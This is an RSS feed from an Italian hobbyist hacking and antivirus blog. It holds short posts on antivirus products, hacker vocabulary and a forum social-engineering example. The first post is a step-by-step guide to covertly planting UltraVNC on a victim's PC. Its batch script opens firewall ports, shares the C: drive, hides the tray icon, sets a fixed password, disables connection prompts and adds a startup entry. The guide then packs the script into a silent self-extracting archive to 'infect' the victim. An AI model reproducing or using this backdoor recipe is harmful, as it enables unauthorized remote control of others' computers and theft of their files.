<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title></title>
	<atom:link href="http://securitypc.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://securitypc.wordpress.com</link>
	<description>Il blog di HackerDomination..</description>
	<lastBuildDate>Sat, 26 Apr 2008 17:53:26 +0000</lastBuildDate>
	<generator>http://wordpress.com/</generator>
	<language>it</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<cloud domain='securitypc.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://www.gravatar.com/blavatar/ac53ea2428776170ef43c2e964c12600?s=96&#038;d=http://s.wordpress.com/i/buttonw-com.png</url>
		<title></title>
		<link>http://securitypc.wordpress.com</link>
	</image>
			<item>
		<title>UltraVNC (installazione in remoto)</title>
		<link>http://securitypc.wordpress.com/2008/04/26/ultravnc-installazione-in-remoto/</link>
		<comments>http://securitypc.wordpress.com/2008/04/26/ultravnc-installazione-in-remoto/#comments</comments>
		<pubDate>Sat, 26 Apr 2008 17:50:51 +0000</pubDate>
		<dc:creator>crasher90</dc:creator>
				<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://securitypc.wordpress.com/?p=16</guid>
		<description><![CDATA[Che cos&#8217;è ULTRAVNC?
UltraVNC è un&#8217;applicazione in grado di stabilire una connessione tra due o più PC permettendo non soltanto di vedere una riproduzione esatta del desktop, ma anche di controllare completamente il PC su cui è stato installato VNC server. Tutto ciò è possibile grazie all&#8217;utilizzo del protocollo VNC (Virtual Network Computing), una tecnologia sviluppata [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=securitypc.wordpress.com&blog=3580549&post=16&subd=securitypc&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Che cos&#8217;è ULTRAVNC?</p>
<p>UltraVNC è un&#8217;applicazione in grado di stabilire una connessione tra due o più PC permettendo non soltanto di vedere una riproduzione esatta del desktop, ma anche di controllare completamente il PC su cui è stato installato VNC server. Tutto ciò è possibile grazie all&#8217;utilizzo del protocollo VNC (Virtual Network Computing), una tecnologia sviluppata per il cosiddetto desktop sharing: questa funzione prevede la presenza di una parte destinata a fare lo streaming dei dati (server) e di una per la riproduzione del flusso di dati (client); ovviamente la parte server dovrà essere installata sul PC che si desidera monitorare, mentre quella client andrà posizionata sul sistema di controllo.</p>
<p><img src="http://wareseeker.com/images/categories/Network-Internet/Remote-Computing-Tools/scr_ultravnc-1.0.3.jpg" alt="" /></p>
<p><strong>GUIDA A SCOPO PURAMENTE INFORMATIVO. NON MI ASSUMO NESSUNA RESPONSABILITA&#8217; DI CIO&#8217; CHE NE FARETE: (Autori della guida &#8220;CrAsHer_90&#8243; e &#8220;N3T&#8221;)</strong></p>
<p>Accesso in remoto tramite il noto programma VNC. Prima di tutto scaricate ULTRAVNC <a href="http://downloads.sourceforge.net/ultravnc/UltraVNC-102-Setup.exe?modtime=1151766455&amp;big_mirror=0">Download</a></p>
<p>dopo averlo installato aprite il blocco note ed inserite il codice che segue:<br />
===============================================================================<br />
<code> @echo off<br />
netsh firewall add portopening TCP 5900 PORTAWEB<br />
netsh firewall add portopening TCP 139 PORTAWEB<br />
net share disco=C:\<br />
netsh firewall add allowedprogram program= C:\winvnc.exe  name= mqdsmode=enablescope=all profile=all<br />
@echo off<br />
REG ADD HKEY_CURRENT_USER\Software\ORL<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v AutoPortSelect /t REG_DWORD /d 1 /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v BlackAlphaBlending /t REG_DWORD /d 0 /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v BlankMonitorEnable /t REG_DWORD /d 1 /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v CaptureAlphaBlending /t REG_DWORD /d 0 /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v DefaultScale /t REG_DWORD /d 1 /f<br />
REG ADD HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1 /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v FileTransferEnable /t REG_DWORD /d 1 /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v FTUserImpersonation /t REG_DWORD /d 1 /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v HTTPConnect /t REG_DWORD /d 1 /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v Idle Timeout /t REG_DWORD /d 0 /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v InputsEnabled /t REG_DWORD /d 1 /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v LocalInputDisabled /t REG_DWORD /d 0 /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v LockSetting /t REG_DWORD /d 0 /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v OnlyPollConsole /t REG_DWORD /d 1 /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v OnlyPollOnEvent /t REG_DWORD /d 0 /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v Password /t REG_BINARY /d F3268FE776CDFF8A /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollForeground /t REG_DWORD /d 1 /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollFullScreen /t REG_DWORD /d 0 /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollUnderCursor /t REG_DWORD /d 0 /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v QueryAccept /t REG_DWORD /d 0 /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v QuerySetting /t REG_DWORD /d 2 /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0 /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v SocketConnect /t REG_DWORD /d 1 /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v UseDSMPlugin /t REG_DWORD /d 0 /f<br />
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v XDMCPConnect /t REG_DWORD /d 0 /f<br />
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Winvnc /t REG_SZ /d "C:\winvnc.exe"<br />
@start c:\winvnc.exe<br />
exit </code><br />
===================================================================================<br />
Adesso salvatelo con estensione .bat (come potete notare nel codice batch ho messo pure il comando per aprire la porta 139 e per condividere il disco C:\) potete compilare il codice batch in modalità &#8220;Ghost&#8221; con Quick Batch File Compiler . Fatto ciò andate su Risorse del computer&lt;C:\&lt;Programmi&lt;ultravnc e prelevate &#8220;winvnc.exe&#8221; (server del vnc) mettetelo nel desktop assieme al file.bat (o file.exe se l&#8217;avete compilato in modalità ghost). Ora metteteli in un archivio AUTOESTRAENTE che dovrà estrarre i file in C:\ e che dovrà lanciare in automatico il file.bat e di conseguenza lancerà il server. (@start C:\winvnc.exe)<br />
una volta infettata la vittima con l&#8217;exe creato&#8230; aprite il client (vncviewer) inserite l&#8217;ip e godetevi il desktop remoto <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><strong>Guida: By &#8220;CrAsHeR_90&#8243; e &#8220;N3T&#8221;</strong></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/securitypc.wordpress.com/16/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/securitypc.wordpress.com/16/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/securitypc.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/securitypc.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/securitypc.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/securitypc.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/securitypc.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/securitypc.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/securitypc.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/securitypc.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/securitypc.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/securitypc.wordpress.com/16/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=securitypc.wordpress.com&blog=3580549&post=16&subd=securitypc&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://securitypc.wordpress.com/2008/04/26/ultravnc-installazione-in-remoto/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/05b88c396df8bf665eb3862946cecb9e?s=96&#38;d=identicon" medium="image">
			<media:title type="html">crasher90</media:title>
		</media:content>

		<media:content url="http://wareseeker.com/images/categories/Network-Internet/Remote-Computing-Tools/scr_ultravnc-1.0.3.jpg" medium="image" />
	</item>
		<item>
		<title>Social Engineering</title>
		<link>http://securitypc.wordpress.com/2008/04/26/social-engineering/</link>
		<comments>http://securitypc.wordpress.com/2008/04/26/social-engineering/#comments</comments>
		<pubDate>Sat, 26 Apr 2008 15:44:25 +0000</pubDate>
		<dc:creator>DaRk MoNsTeR</dc:creator>
				<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://securitypc.wordpress.com/?p=15</guid>
		<description><![CDATA[Girando per i web si può notare che questa tecnica viene sfruttata molto, specialmente nei forum ad esempio:
Utente: Ciao
Founder: Ciao
Utente: Bello il forum, però manca qualcosa ad esempio una bella skin personalizzata..
Founder: E si pultroppo non me ne intendo molto di grafica..
Utente: io sono molto bravo
Founder: Ah si, allora la puoi creare tu?
Utente: Per me [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=securitypc.wordpress.com&blog=3580549&post=15&subd=securitypc&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Girando per i web si può notare che questa tecnica viene sfruttata molto, specialmente nei forum ad esempio:</p>
<blockquote><p><strong>Utente</strong>: Ciao</p>
<p><strong>Founder</strong>: Ciao</p>
<p><strong>Utente</strong>: Bello il forum, però manca qualcosa ad esempio una bella skin personalizzata..</p>
<p><strong>Founder</strong>: E si pultroppo non me ne intendo molto di grafica..</p>
<p><strong>Utente</strong>: io sono molto bravo</p>
<p><strong>Founder</strong>: Ah si, allora la puoi creare tu?</p>
<p><strong>Utente</strong>: Per me va bene, però mettimi almeno admin.</p>
<p><strong>Founder</strong>: ok allora ti metto admin.</p></blockquote>
<p>Ecco qua un esempio sciocco ma davvero micidiale che nella maggior parte dei casi vieni usato dai lamer, per impadronirsi del pieno controllo amministrativo e quindi fare ciò che si vuole al forum, dovete tenere per questo gli occhi aperti, prima di assumere una persona allo staff la dovete conoscere, non potete mettere il primo che capita..</p>
<p>Nell&#8217;esempio potete capire che in questa tecnica non c&#8217;è alcun metodo per fermarla ma và oltre il pc, colpisce la mente, sarà la mente stessa a poterla fermare..</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/securitypc.wordpress.com/15/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/securitypc.wordpress.com/15/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/securitypc.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/securitypc.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/securitypc.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/securitypc.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/securitypc.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/securitypc.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/securitypc.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/securitypc.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/securitypc.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/securitypc.wordpress.com/15/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=securitypc.wordpress.com&blog=3580549&post=15&subd=securitypc&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://securitypc.wordpress.com/2008/04/26/social-engineering/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/3ac20d9fd11a32ec665b3f15dd7e1814?s=96&#38;d=identicon" medium="image">
			<media:title type="html">DaRk MoNsTeR</media:title>
		</media:content>
	</item>
		<item>
		<title>Avast! 4 Home Edition</title>
		<link>http://securitypc.wordpress.com/2008/04/26/avast-4-home-edition/</link>
		<comments>http://securitypc.wordpress.com/2008/04/26/avast-4-home-edition/#comments</comments>
		<pubDate>Sat, 26 Apr 2008 15:24:23 +0000</pubDate>
		<dc:creator>DaRk MoNsTeR</dc:creator>
				<category><![CDATA[Antivirus]]></category>

		<guid isPermaLink="false">http://securitypc.wordpress.com/?p=14</guid>
		<description><![CDATA[
Avast! Home Edition è ora gratuito per utenti HOME (domestici) e per uso NON-COMMERCIALE. Per ulteriori informazioni cliccare qui. Se non siete utenti domestici, o utilizzate il computer per lavoro, non è possibile utilizzare avast! Home Edition, e occorre acquistare la versione commerciale &#8211; avast! Professional Edition.
Per utilizzare la Home Edition, dovete registrarvi qui. Dopo [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=securitypc.wordpress.com&blog=3580549&post=14&subd=securitypc&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p><img src="http://img403.imageshack.us/img403/9914/avastantiviruspngik3.jpg" alt="" /></p>
<p>Avast! Home Edition è ora gratuito per utenti <strong>HOME</strong> (domestici) e per uso <strong>NON-COMMERCIALE</strong>. Per ulteriori informazioni cliccare <a href="http://www.avast.com/ita/free_virus_protectio.html">qui</a>. Se non siete utenti domestici, o utilizzate il computer per lavoro, non è possibile utilizzare avast! Home Edition, e occorre acquistare la versione commerciale &#8211; <a href="http://www.avast.com/ita/avast_4_professional.html">avast! Professional Edition</a>.</p>
<p>Per utilizzare la Home Edition, dovete registrarvi <a href="http://www.avast.com/eng/home-registration.php">qui</a>. Dopo la prima installazione avete 60 giorni di tempo per provare il programma (come per tutti i prodotti avast!) prima di completare la registrazione. Il processo di registrazione è molto semplice e veloce: sono necessari solo un paio di minuti&#8230;.</p>
<p>Tutti i pacchetti di setup sono eseguibili automaticamente e digitalmente firmati da ALWIL Software.</p>
<p><a href="http://www.avast.com/ita/download-avast-home.html">Sito ufficiale</a>.</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/securitypc.wordpress.com/14/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/securitypc.wordpress.com/14/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/securitypc.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/securitypc.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/securitypc.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/securitypc.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/securitypc.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/securitypc.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/securitypc.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/securitypc.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/securitypc.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/securitypc.wordpress.com/14/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=securitypc.wordpress.com&blog=3580549&post=14&subd=securitypc&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://securitypc.wordpress.com/2008/04/26/avast-4-home-edition/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/3ac20d9fd11a32ec665b3f15dd7e1814?s=96&#38;d=identicon" medium="image">
			<media:title type="html">DaRk MoNsTeR</media:title>
		</media:content>

		<media:content url="http://img403.imageshack.us/img403/9914/avastantiviruspngik3.jpg" medium="image" />
	</item>
		<item>
		<title>I migliori Antivirus del 2008</title>
		<link>http://securitypc.wordpress.com/2008/04/26/i-migliori-antivirus-del-2008/</link>
		<comments>http://securitypc.wordpress.com/2008/04/26/i-migliori-antivirus-del-2008/#comments</comments>
		<pubDate>Sat, 26 Apr 2008 15:06:02 +0000</pubDate>
		<dc:creator>DaRk MoNsTeR</dc:creator>
				<category><![CDATA[Antivirus]]></category>

		<guid isPermaLink="false">http://securitypc.wordpress.com/?p=13</guid>
		<description><![CDATA[Questo articolo vi mosterà i migliori antivirus del 2008, le fasce di risultato sono tre: Advance+ (indica un’ eccellente percentuale di indivuazione virus) Advanced (indica un ottima percentuale) standard (un buon risultato). Vediamo la classifica:
Livello ADVANCED+
 

Kaspersky
Nod32

Livello ADVANCED

Avg
Avk
Avast!
Mc Afee
MIcrosoft
Norman
Symantec

Livello STANDARD

Avira
BitDefender
Dr Web
e  scan
F- prot
F- secure
TrustPort

Fonte: TechnoBlog
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=securitypc.wordpress.com&blog=3580549&post=13&subd=securitypc&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Questo articolo vi mosterà i migliori antivirus del 2008, le fasce di risultato sono tre: <strong>Advance+</strong> (indica un’ eccellente percentuale di indivuazione virus) <strong>Advanced</strong> (indica un ottima percentuale) <strong>standard</strong> (un buon risultato). Vediamo la classifica:</p>
<p>Livello <strong>ADVANCED+</strong><br />
<em> </em></p>
<ul>
<li>Kaspersky</li>
<li>Nod32</li>
</ul>
<p>Livello <strong>ADVANCED</strong></p>
<ul>
<li>Avg</li>
<li>Avk</li>
<li>Avast!</li>
<li>Mc Afee</li>
<li>MIcrosoft</li>
<li>Norman</li>
<li>Symantec</li>
</ul>
<p>Livello <strong>STANDARD</strong></p>
<ul>
<li>Avira</li>
<li>BitDefender</li>
<li>Dr Web</li>
<li>e  scan</li>
<li>F- prot</li>
<li>F- secure</li>
<li>TrustPort</li>
</ul>
<p>Fonte: <a title="Fonte Articolo" href="http://tecnoblog.girlpower.it/computer/migliori-antivirus-av-comparatives">TechnoBlog</a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/securitypc.wordpress.com/13/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/securitypc.wordpress.com/13/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/securitypc.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/securitypc.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/securitypc.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/securitypc.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/securitypc.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/securitypc.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/securitypc.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/securitypc.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/securitypc.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/securitypc.wordpress.com/13/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=securitypc.wordpress.com&blog=3580549&post=13&subd=securitypc&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://securitypc.wordpress.com/2008/04/26/i-migliori-antivirus-del-2008/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/3ac20d9fd11a32ec665b3f15dd7e1814?s=96&#38;d=identicon" medium="image">
			<media:title type="html">DaRk MoNsTeR</media:title>
		</media:content>
	</item>
		<item>
		<title>Cos&#8217;è l&#8217;antivirus?</title>
		<link>http://securitypc.wordpress.com/2008/04/26/cose-lantivirus/</link>
		<comments>http://securitypc.wordpress.com/2008/04/26/cose-lantivirus/#comments</comments>
		<pubDate>Sat, 26 Apr 2008 14:32:58 +0000</pubDate>
		<dc:creator>DaRk MoNsTeR</dc:creator>
				<category><![CDATA[Antivirus]]></category>

		<guid isPermaLink="false">http://securitypc.wordpress.com/?p=11</guid>
		<description><![CDATA[
L&#8217;antivirus è un comune software che aiuta il pc, può rilevare virus, worm, trojan e altro..
Il problema è che bisogna avere sempre una versione aggiornata per rilevare tutte queste minacce anche perchè non è detto che l&#8217;antivirus le rilevi tutte!
Il funzionamento è basato sulla RAM dove il software cerca di rilevare i frammenti di codice [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=securitypc.wordpress.com&blog=3580549&post=11&subd=securitypc&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p><img src="http://img126.imageshack.us/img126/6258/aae1246238mb1.jpg" alt="" /></p>
<p>L&#8217;antivirus è un comune software che aiuta il pc, può rilevare virus, worm, trojan e altro..</p>
<p>Il problema è che bisogna avere sempre una versione aggiornata per rilevare tutte queste minacce anche perchè non è detto che l&#8217;antivirus le rilevi tutte!</p>
<p>Il funzionamento è basato sulla RAM dove il software cerca di rilevare i frammenti di codice dannosi (virus) per eliminarli.</p>
<p>Se volete approfondire questo argomento vi potete racare a questo <a href="http://it.wikipedia.org/wiki/Antivirus">link</a>.</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/securitypc.wordpress.com/11/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/securitypc.wordpress.com/11/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/securitypc.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/securitypc.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/securitypc.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/securitypc.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/securitypc.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/securitypc.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/securitypc.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/securitypc.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/securitypc.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/securitypc.wordpress.com/11/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=securitypc.wordpress.com&blog=3580549&post=11&subd=securitypc&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://securitypc.wordpress.com/2008/04/26/cose-lantivirus/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/3ac20d9fd11a32ec665b3f15dd7e1814?s=96&#38;d=identicon" medium="image">
			<media:title type="html">DaRk MoNsTeR</media:title>
		</media:content>

		<media:content url="http://img126.imageshack.us/img126/6258/aae1246238mb1.jpg" medium="image" />
	</item>
		<item>
		<title>Vocaboli</title>
		<link>http://securitypc.wordpress.com/2008/04/26/vocaboli/</link>
		<comments>http://securitypc.wordpress.com/2008/04/26/vocaboli/#comments</comments>
		<pubDate>Sat, 26 Apr 2008 14:16:27 +0000</pubDate>
		<dc:creator>DaRk MoNsTeR</dc:creator>
				<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://securitypc.wordpress.com/?p=10</guid>
		<description><![CDATA[Hacker
In questi ultimi tempi girovagando per il web e per i forum si può notare che tante persone hanno nella firma la targhetta &#8220;hacker&#8221; e alcune di esse non hanno le minime conoscenze di tutto questo, perchè:
Orami per alcune persone è diventato un privilegio solo essere chiamati &#8220;hacker&#8221; no per le cose che sanno fare, [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=securitypc.wordpress.com&blog=3580549&post=10&subd=securitypc&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p><strong>Hacker</strong><br />
In questi ultimi tempi girovagando per il web e per i forum si può notare che tante persone hanno nella firma la targhetta &#8220;hacker&#8221; e alcune di esse non hanno le minime conoscenze di tutto questo, perchè:<br />
Orami per alcune persone è diventato un privilegio solo essere chiamati &#8220;hacker&#8221; no per le cose che sanno fare, lasciando questo penso che nessuno si dovrebbe definirsi hacker da solo, perchè l&#8217;hacking non comprende solo queste conoscenze, l&#8217;hacker vero non sò neanche io cosa sia perchè non ci sarà mai una spiegazione precisa di tutto ciò. Se volete approfondire questo argomento vi potete recare a questo <a href="http://it.wikipedia.org/wiki/Hacker" target="_blank">link</a>.</p>
<p><strong>Cracker</strong><br />
Il termine cracker spesse volte può essere affiancato o scambiato con il termine &#8220;hacker&#8221; invece tutto questo è sbagliato perchè sono due mondi diversi, il cracker mira a sfruttare i cosiddetti &#8220;bug&#8221; nei siti, per dedurre dei guadagni ad esempio possono essere dei guadagni anche economici. Se volete approfondire questo argomento vi potete recare a questo <a href="http://it.wikipedia.org/wiki/Cracker" target="_blank">link</a>.</p>
<p><strong>Lamer</strong><br />
Il lamer è colui che è privo di conoscenze soprattutto nel mondo della programmazione e si limita ad usare programmi altrui per recare danni ad una persona, di solito reca danni per il gusto di saperlo fare e di divertirsi, ad esempio visto che le sue conoscenze sono poche si può anche limitare a rubare account sempre per il solo gusto e alcuni di essi facendo queste cose si sentono hacker cosa che gli hacker detestano..<br />
Spero che ogni persona sia consapevole di cosa sia il termine lamer. Se volete approfondire questo argomento vi potete recare a questo <a href="http://it.wikipedia.org/wiki/Lamer" target="_blank">link</a>.</p>
<p><strong>Wannabe</strong><br />
Questo termine è abbastanza semplice, oramai non è molto usato ma significa una persona che si spaccia per hacker quando non ha conoscenze di tutto ciò..</p>
<p>Questa spiegazione dei vocaboli è stata scritta da me, per maggiori informazioni nel web potete trovare altro..</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/securitypc.wordpress.com/10/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/securitypc.wordpress.com/10/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/securitypc.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/securitypc.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/securitypc.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/securitypc.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/securitypc.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/securitypc.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/securitypc.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/securitypc.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/securitypc.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/securitypc.wordpress.com/10/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=securitypc.wordpress.com&blog=3580549&post=10&subd=securitypc&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://securitypc.wordpress.com/2008/04/26/vocaboli/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/3ac20d9fd11a32ec665b3f15dd7e1814?s=96&#38;d=identicon" medium="image">
			<media:title type="html">DaRk MoNsTeR</media:title>
		</media:content>
	</item>
		<item>
		<title>Nod32</title>
		<link>http://securitypc.wordpress.com/2008/04/26/nod32/</link>
		<comments>http://securitypc.wordpress.com/2008/04/26/nod32/#comments</comments>
		<pubDate>Sat, 26 Apr 2008 13:49:34 +0000</pubDate>
		<dc:creator>DaRk MoNsTeR</dc:creator>
